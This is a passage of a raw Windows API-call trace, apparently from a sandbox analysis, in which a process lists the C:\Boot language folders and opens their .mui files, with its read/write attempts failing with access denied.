hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0071.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0071.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0071.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0071.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0071.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0071.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0071.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.083] AreFileApisANSI () returned 1 [0071.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-CN\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-CN\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0071.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0071.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0071.083] AreFileApisANSI () returned 1 [0071.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0071.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0071.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-CN\\memtest.exe.mui") returned 30 [0071.084] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0071.084] GetFileType (hFile=0x41c) returned 0x1 [0071.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.084] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.084] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.084] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.084] CloseHandle (hObject=0x41c) returned 1 [0071.084] AreFileApisANSI () returned 1 [0071.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0071.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0071.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-CN\\memtest.exe.mui") returned 30 [0071.085] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.085] GetLastError () returned 0x5 [0071.085] GetLastError () returned 0x5 [0071.085] SetLastError (dwErrCode=0x5) [0071.085] GetLastError () returned 0x5 [0071.085] SetLastError (dwErrCode=0x5) [0071.085] GetLastError () returned 0x5 [0071.085] SetLastError (dwErrCode=0x5) [0071.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0071.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0071.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.085] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ꖠ")) returned 0 [0071.085] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0071.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0071.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0071.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0071.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0071.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.086] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.086] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.086] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.086] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.086] AreFileApisANSI () returned 1 [0071.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-HK", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-HK", lpUsedDefaultChar=0x0) returned 14 [0071.086] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.086] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0071.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.086] AreFileApisANSI () returned 1 [0071.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0071.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x887c0 [0071.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x887c0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\zh-HK") returned 14 [0071.087] CreateFileW (lpFileName="C:\\Boot\\zh-HK" (normalized: "c:\\boot\\zh-hk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.087] GetLastError () returned 0x5 [0071.087] GetLastError () returned 0x5 [0071.087] SetLastError (dwErrCode=0x5) [0071.087] GetLastError () returned 0x5 [0071.087] SetLastError (dwErrCode=0x5) [0071.087] GetLastError () returned 0x5 [0071.087] SetLastError (dwErrCode=0x5) [0071.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0071.087] AreFileApisANSI () returned 1 [0071.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0071.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88770 [0071.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88770, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\zh-HK") returned 14 [0071.088] CreateFileW (lpFileName="C:\\Boot\\zh-HK" (normalized: "c:\\boot\\zh-hk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.088] GetLastError () returned 0x5 [0071.088] GetLastError () returned 0x5 [0071.088] SetLastError (dwErrCode=0x5) [0071.088] GetLastError () returned 0x5 [0071.088] SetLastError (dwErrCode=0x5) [0071.088] GetLastError () returned 0x5 [0071.088] SetLastError (dwErrCode=0x5) [0071.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0071.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.088] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0071.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0071.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.088] FindFirstFileExW (in: lpFileName="C:\\Boot\\zh-HK\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78550 [0071.089] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.089] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf958, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0071.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0071.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0071.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0071.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0071.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0071.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.090] AreFileApisANSI () returned 1 [0071.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-HK\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-HK\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0071.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0071.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0071.090] AreFileApisANSI () returned 1 [0071.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0071.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0071.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 30 [0071.090] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0071.091] GetFileType (hFile=0x41c) returned 0x1 [0071.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.091] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.091] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.091] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.092] CloseHandle (hObject=0x41c) returned 1 [0071.092] AreFileApisANSI () returned 1 [0071.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0071.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0071.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 30 [0071.092] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.092] GetLastError () returned 0x5 [0071.092] GetLastError () returned 0x5 [0071.092] SetLastError (dwErrCode=0x5) [0071.092] GetLastError () returned 0x5 [0071.092] SetLastError (dwErrCode=0x5) [0071.092] GetLastError () returned 0x5 [0071.092] SetLastError (dwErrCode=0x5) [0071.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0071.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.092] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x518ea25e, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe31db522, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0071.092] RtlAllocateHeap (HeapHandle=0x20000, 